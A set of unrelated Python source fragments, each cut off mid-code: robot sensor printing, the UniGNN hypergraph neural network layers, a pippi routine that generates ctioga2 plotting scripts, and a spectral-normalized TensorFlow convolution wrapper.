print('sample_num_node = ' + str(self.sample_num_node_FM))
print('cnt_now = ' + str(self.cnt_now[0]) + ', ' + str(self.cnt_now[1]) + ', ' + str(self.cnt_now[2]) + ', ' + str(self.cnt_now[3]))
print('omega_res_x10 = ' + str(self.omega_res_x10[0]) + ', ' + str(self.omega_res_x10[1]) + ', ' + str(self.omega_res_x10[2]) + ', ' + str(self.omega_res_x10[3]))
print('omega_cmd_x10 = ' + str(self.omega_cmd_x10[0]) + ', ' + str(self.omega_cmd_x10[1]) + ', ' + str(self.omega_cmd_x10[2]) + ', ' + str(self.omega_cmd_x10[3]))
print('vout = ' + str(self.vout[0]) + ', ' + str(self.vout[1]) + ', ' + str(self.vout[2]) + ', ' + str(self.vout[3]))
print('dx_cmd_x10 = ' + str(self.dx_cmd_x10[0]) + ', ' + str(self.dx_cmd_x10[1]) + ', ' + str(self.dx_cmd_x10[2]))
def print_sensor(self):
print('sample_num_node_MEGA = ' + str(self.sample_num_node_MEGA))
print('ir_hex = ' + hex(self.ir_hex) + ', ir_bin = ' + bin(self.ir_hex))
print('ax = ' + '{:=+6}'.format(int(self.ax)) + ', ay = ' + '{:=+6}'.format(int(self.ay)) + ', az = ' + '{:=+6}'.format(int(self.az)))
print('gx = ' + '{:=+6}'.format(int(self.gx)) + ', gy = ' + '{:=+6}'.format(int(self.gy)) + ', gz = ' + '{:=+6}'.format(int(self.gz)))
print('mx = ' + '{:=+6}'.format(int(self.mx)) + ', my = ' + '{:=+6}'.format(int(self.my)) + ', mz = ' + '{:=+6}'.format(int(self.mz)) + ', temp = {:=+6}'.format(int(self.temp)))
print('us_dist = ' + '{:=5}'.format(int(self.us_dist[0])) + ', ' + '{:=6}'.format(int(self.us_dist[2])) + ', ' + '{:=6}'.format(int(self.us_dist[2])) + ', ' + '{:=6}'.format(int(self.us_dist[3])))
print('us_dist = ' + '{:=5}'.format(int(self.us_dist[4])) + ', ' + '{:=6}'.format(int(self.us_dist[5])) + ', ' + '{:=6}'.format(int(self.us_dist[6])) + ', ' + '{:=6}'.format(int(self.us_dist[7])))
print('us_ok = ' | |
<reponame>czc567/UniGNN<filename>model/UniGNN.py
import torch
import torch.nn as nn, torch.nn.functional as F
from torch.nn.parameter import Parameter
import math
from torch_scatter import scatter
from torch_geometric.utils import softmax
# NOTE: can not tell which implementation is better statistically
def glorot(tensor):
if tensor is not None:
stdv = math.sqrt(6.0 / (tensor.size(-2) + tensor.size(-1)))
tensor.data.uniform_(-stdv, stdv)
def normalize_l2(X):
"""Row-normalize matrix"""
rownorm = X.detach().norm(dim=1, keepdim=True)
scale = rownorm.pow(-1)
scale[torch.isinf(scale)] = 0.
X = X * scale
return X
# v1: X -> XW -> AXW -> norm
class UniSAGEConv(nn.Module):
def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
super().__init__()
# TODO: bias?
self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
self.heads = heads
self.in_channels = in_channels
self.out_channels = out_channels
self.negative_slope = negative_slope
self.dropout = dropout
self.args = args
def __repr__(self):
return '{}({}, {}, heads={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels, self.heads)
def forward(self, X, vertex, edges):
N = X.shape[0]
# X0 = X # NOTE: reserved for skip connection
X = self.W(X)
Xve = X[vertex] # [nnz, C]
Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, C]
Xev = Xe[edges] # [nnz, C]
Xv = scatter(Xev, vertex, dim=0, reduce=self.args.second_aggregate, dim_size=N) # [N, C]
X = X + Xv
if self.args.use_norm:
X = normalize_l2(X)
# NOTE: concat heads or mean heads?
# NOTE: normalize here?
# NOTE: skip concat here?
return X
# v1: X -> XW -> AXW -> norm
class UniGINConv(nn.Module):
def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
super().__init__()
self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
self.heads = heads
self.in_channels = in_channels
self.out_channels = out_channels
self.negative_slope = negative_slope
self.dropout = dropout
self.eps = nn.Parameter(torch.Tensor([0.]))
self.args = args
def __repr__(self):
return '{}({}, {}, heads={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels, self.heads)
def forward(self, X, vertex, edges):
N = X.shape[0]
# X0 = X # NOTE: reserved for skip connection
# v1: X -> XW -> AXW -> norm
X = self.W(X)
Xve = X[vertex] # [nnz, C]
Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, C]
Xev = Xe[edges] # [nnz, C]
Xv = scatter(Xev, vertex, dim=0, reduce='sum', dim_size=N) # [N, C]
X = (1 + self.eps) * X + Xv
if self.args.use_norm:
X = normalize_l2(X)
# NOTE: concat heads or mean heads?
# NOTE: normalize here?
# NOTE: skip concat here?
return X
# v1: X -> XW -> AXW -> norm
class UniGCNConv(nn.Module):
def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
super().__init__()
self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
self.heads = heads
self.in_channels = in_channels
self.out_channels = out_channels
self.negative_slope = negative_slope
self.dropout = dropout
self.args = args
def __repr__(self):
return '{}({}, {}, heads={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels, self.heads)
def forward(self, X, vertex, edges):
N = X.shape[0]
degE = self.args.degE
degV = self.args.degV
# v1: X -> XW -> AXW -> norm
X = self.W(X)
Xve = X[vertex] # [nnz, C]
Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, C]
Xe = Xe * degE
Xev = Xe[edges] # [nnz, C]
Xv = scatter(Xev, vertex, dim=0, reduce='sum', dim_size=N) # [N, C]
Xv = Xv * degV
X = Xv
if self.args.use_norm:
X = normalize_l2(X)
# NOTE: skip concat here?
return X
# v2: X -> AX -> norm -> AXW
class UniGCNConv2(nn.Module):
def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
super().__init__()
self.W = nn.Linear(in_channels, heads * out_channels, bias=True)
self.heads = heads
self.in_channels = in_channels
self.out_channels = out_channels
self.negative_slope = negative_slope
self.dropout = dropout
self.args = args
def __repr__(self):
return '{}({}, {}, heads={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels, self.heads)
def forward(self, X, vertex, edges):
N = X.shape[0]
degE = self.args.degE
degV = self.args.degV
# v3: X -> AX -> norm -> AXW
Xve = X[vertex] # [nnz, C]
Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, C]
Xe = Xe * degE
Xev = Xe[edges] # [nnz, C]
Xv = scatter(Xev, vertex, dim=0, reduce='sum', dim_size=N) # [N, C]
Xv = Xv * degV
X = Xv
if self.args.use_norm:
X = normalize_l2(X)
X = self.W(X)
# NOTE: result might be slighly unstable
# NOTE: skip concat here?
return X
class UniGATConv(nn.Module):
def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2, skip_sum=False):
super().__init__()
self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
self.att_v = nn.Parameter(torch.Tensor(1, heads, out_channels))
self.att_e = nn.Parameter(torch.Tensor(1, heads, out_channels))
self.heads = heads
self.in_channels = in_channels
self.out_channels = out_channels
self.attn_drop = nn.Dropout(dropout)
self.leaky_relu = nn.LeakyReLU(negative_slope)
self.skip_sum = skip_sum
self.args = args
self.reset_parameters()
def __repr__(self):
return '{}({}, {}, heads={})'.format(self.__class__.__name__,
self.in_channels,
self.out_channels, self.heads)
def reset_parameters(self):
glorot(self.att_v)
glorot(self.att_e)
def forward(self, X, vertex, edges):
H, C, N = self.heads, self.out_channels, X.shape[0]
# X0 = X # NOTE: reserved for skip connection
X0 = self.W(X)
X = X0.view(N, H, C)
Xve = X[vertex] # [nnz, H, C]
Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, H, C]
alpha_e = (Xe * self.att_e).sum(-1) # [E, H, 1]
a_ev = alpha_e[edges]
alpha = a_ev # Recommed to use this
alpha = self.leaky_relu(alpha)
alpha = softmax(alpha, vertex, num_nodes=N)
alpha = self.attn_drop( alpha )
alpha = alpha.unsqueeze(-1)
Xev = Xe[edges] # [nnz, H, C]
Xev = Xev * alpha
Xv = scatter(Xev, vertex, dim=0, reduce='sum', dim_size=N) # [N, H, C]
X = Xv
X = X.view(N, H * C)
if self.args.use_norm:
X = normalize_l2(X)
if self.skip_sum:
X = X + X0
# NOTE: concat heads or mean heads?
# NOTE: skip concat here?
return X
__all_convs__ = {
'UniGAT': UniGATConv,
'UniGCN': UniGCNConv,
'UniGCN2': UniGCNConv2,
'UniGIN': UniGINConv,
'UniSAGE': UniSAGEConv,
}
class UniGNN(nn.Module):
def __init__(self, args, nfeat, nhid, nclass, nlayer, nhead, V, E):
"""UniGNN
Args:
args (NamedTuple): global args
nfeat (int): dimension of features
nhid (int): dimension of hidden features, note that actually it\'s #nhid x #nhead
nclass (int): number of classes
nlayer (int): number of hidden layers
nhead (int): number of conv heads
V (torch.long): V is the row index for the sparse incident matrix H, |V| x |E|
E (torch.long): E is the col index for the sparse incident matrix H, |V| x |E|
"""
super().__init__()
Conv = __all_convs__[args.model_name]
self.conv_out = Conv(args, nhid * nhead, nclass, heads=1, dropout=args.attn_drop)
self.convs = nn.ModuleList(
[ Conv(args, nfeat, nhid, heads=nhead, dropout=args.attn_drop)] +
[Conv(args, nhid * nhead, nhid, heads=nhead, dropout=args.attn_drop) for _ in range(nlayer-2)]
)
self.V = V
self.E = E
act = {'relu': nn.ReLU(), 'prelu':nn.PReLU() }
self.act = act[args.activation]
self.input_drop = nn.Dropout(args.input_drop)
self.dropout = nn.Dropout(args.dropout)
self.type_norm = args.type_norm
self.num_groups =args.num_groups
self.skip_weight=args.skip_weight
if self.type_norm in ['None', 'batch', 'pair']:
skip_connect = False
else:
skip_connect = True
self.layers_bn = torch.nn.ModuleList([])
for _ in range(nlayer-1):
self.layers_bn.append(batch_norm(nhid * nhead, self.type_norm, skip_connect, self.num_groups, self.skip_weight,
args.skipweight_learnable))
def forward(self, X):
V, E = self.V, self.E
X = self.input_drop(X)
for i, conv in enumerate(self.convs):
X = conv(X, V, E)
X=self.layers_bn[i](X)
X = self.act(X)
X = self.dropout(X)
X = self.conv_out(X, V, E)
return F.log_softmax(X, dim=1)
class UniGCNIIConv(nn.Module):
def __init__(self, args, in_features, out_features):
super().__init__()
self.W = nn.Linear(in_features, out_features, bias=False)
self.args = args
def forward(self, X, vertex, edges, alpha, beta, X0):
N = X.shape[0]
degE = self.args.degE
degV = self.args.degV
Xve = X[vertex] # [nnz, C]
Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, C]
Xe = Xe * degE
Xev = Xe[edges] # [nnz, C]
Xv = scatter(Xev, vertex, dim=0, reduce='sum', dim_size=N) # [N, C]
Xv = Xv * degV
X = Xv
if self.args.use_norm:
X = normalize_l2(X)
Xi = (1-alpha) * X + alpha * X0
X = (1-beta) * Xi + beta * self.W(Xi)
return X
class UniGCNII(nn.Module):
def __init__(self, args, nfeat, nhid, nclass, nlayer, nhead, V, E):
"""UniGNNII
Args:
args (NamedTuple): global args
nfeat (int): dimension of features
nhid (int): dimension of hidden features, note that actually it\'s #nhid x #nhead
nclass (int): number of classes
nlayer (int): number of hidden layers
nhead (int): number of conv heads
V (torch.long): V is the row index for the sparse incident matrix H, |V| x |E|
E (torch.long): E is the col index for the sparse incident matrix H, |V| x |E|
| |
\''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_post2D.bsh', 'w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion +
' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_post2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+ str(right_margin+0.15)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+ str(right_margin+0.02)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \'' +
labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(
' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None:
outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(
' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(
" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_post2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write('/zaxis zvalues ')
outfile.write(
'/color-map \''+colours.value.colourMap(mainContourLevels, 'post')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse +
'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in secContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonPostContourColour2D +
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnPost.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(dirs.secParseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour +
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(
dirs.secParseFilename, plot, 'post', lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour +
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse +
'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in mainContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainPostContourColour2D +
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation +
'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value:
outfile.write(' --legend-line \''+x+'\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Marg.~posterior\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnPost.value:
# Get best-fit point and plot it
bestFit = getCentralVal(dirs.parseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D) +
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value:
# Get posterior mean and plot it
postMean = getCentralVal(dirs.parseFilename, plot, 'post', lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D) +
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef:
outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(
blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate +
' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(
' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \'' +
colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse +
'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange ' +
str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+postColourbarString +
'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_post2D.bsh', shell=True)
# Make observable plotting scripts
#if doObservable.value:
if obsPlots.value is not None:
for column in obsPlots.value:
# Get contours
if contours2D.value is not None:
contourLevelsLike = getContours(dirs.parseFilename, plot, 'like')
contourLevelsObs = getContours_obs(dirs.parseFilename, plot, column)
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef:
markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value:
markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnProf.value:
markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't':
markers.reverse()
# Construct ctioga2 command for each key
for i, key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen':
key[3] /= 1.5
if key[3] > 1.0:
key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8:
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \'' +\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(
key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text ' + \
str(xVals[1])+','+str(yVals[i])+' \''+key[4] + \
'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_obs2D_'+str(column)+'.bsh', 'w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion +
' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_obs2D_'+str(column))
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+ str(right_margin+0.15)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+ str(right_margin+0.02)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
outfile.write(
' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(
' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \'' +
labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(
' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None:
outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
outfile.write(' --plot '+currentParse +
'_obs2D_'+str(column)+'.ct2@1:2:3 ')
#if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write(
'/color-map \''+colours.value.colourMap(contourLevelsObs, 'obs')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse +
'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonProfContourColour2D +
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(
dirs.secParseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour +
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(
dirs.secParseFilename, plot, 'post', lookupKeys)
if not postMean:
sys.exit(
'Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour +
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse +
'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in contourLevelsLike:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainProfContourColour2D +
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation +
'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value:
outfile.write(' --legend-line \''+x+'\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(
dirs.parseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D) +
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(
dirs.parseFilename, plot, 'post', lookupKeys)
if not postMean:
sys.exit(
'Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D) +
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef:
outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(
blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate +
' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(
' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
| |
<reponame>kshmelkov/gan_evaluation<gh_stars>1-10
import tensorflow as tf
slim = tf.contrib.slim
from tensorflow.contrib.framework.python.ops import add_arg_scope
from utils.slim_utils import _build_variable_getter, _add_variable_to_collections, convert_data_format
from tensorflow.python.ops import nn_ops
@add_arg_scope
def convolution(inputs,
num_outputs,
kernel_size=[3, 3],
spectral_normalization=False,
stride=1,
padding='SAME',
data_format=None,
rate=1,
activation_fn=tf.nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=tf.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds an N-D convolution followed by an optional batch_norm layer.
It is required that 1 <= N <= 3.
`convolution` creates a variable called `weights`, representing the
convolutional kernel, that is convolved (actually cross-correlated) with the
`inputs` to produce a `Tensor` of activations. If a `normalizer_fn` is
provided (such as `batch_norm`), it is then applied. Otherwise, if
`normalizer_fn` is None and a `biases_initializer` is provided then a `biases`
variable would be created and added the activations. Finally, if
`activation_fn` is not `None`, it is applied to the activations as well.
Performs atrous convolution with input stride/dilation rate equal to `rate`
if a value > 1 for any dimension of `rate` is specified. In this case
`stride` values != 1 are not supported.
Args:
inputs: A Tensor of rank N+2 of shape
`[batch_size] + input_spatial_shape + [in_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, in_channels] + input_spatial_shape` if data_format starts
with "NC".
num_outputs: Integer, the number of output filters.
kernel_size: A sequence of N positive integers specifying the spatial
dimensions of the filters. Can be a single integer to specify the same
value for all spatial dimensions.
stride: A sequence of N positive integers specifying the stride at which to
compute output. Can be a single integer to specify the same value for all
spatial dimensions. Specifying any `stride` value != 1 is incompatible
with specifying any `rate` value != 1.
padding: One of `"VALID"` or `"SAME"`.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
rate: A sequence of N positive integers specifying the dilation rate to use
for atrous convolution. Can be a single integer to specify the same
value for all spatial dimensions. Specifying any `rate` value != 1 is
incompatible with specifying any `stride` value != 1.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: Collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_scope`.
Returns:
A tensor representing the output of the operation.
Raises:
ValueError: If `data_format` is invalid.
ValueError: Both 'rate' and `stride` are not uniformly 1.
"""
if data_format not in [None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW']:
raise ValueError('Invalid data_format: %r' % (data_format,))
layer_variable_getter = _build_variable_getter(
{'bias': 'biases', 'kernel': 'weights'})
with tf.variable_scope(
scope, 'Conv', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = tf.convert_to_tensor(inputs)
input_rank = inputs.get_shape().ndims
if input_rank != 4:
raise ValueError('Invalid input rank: %i' % (input_rank,))
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = SpectralNormalizedConvolution2D(
filters=num_outputs,
kernel_size=kernel_size,
spectral_normalization=spectral_normalization,
strides=stride,
padding=padding,
data_format=df,
dilation_rate=rate,
activation=None,
use_bias=not normalizer_fn and biases_initializer,
kernel_initializer=weights_initializer,
bias_initializer=biases_initializer,
kernel_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.kernel, variables_collections, 'weights')
if layer.use_bias:
_add_variable_to_collections(layer.bias, variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
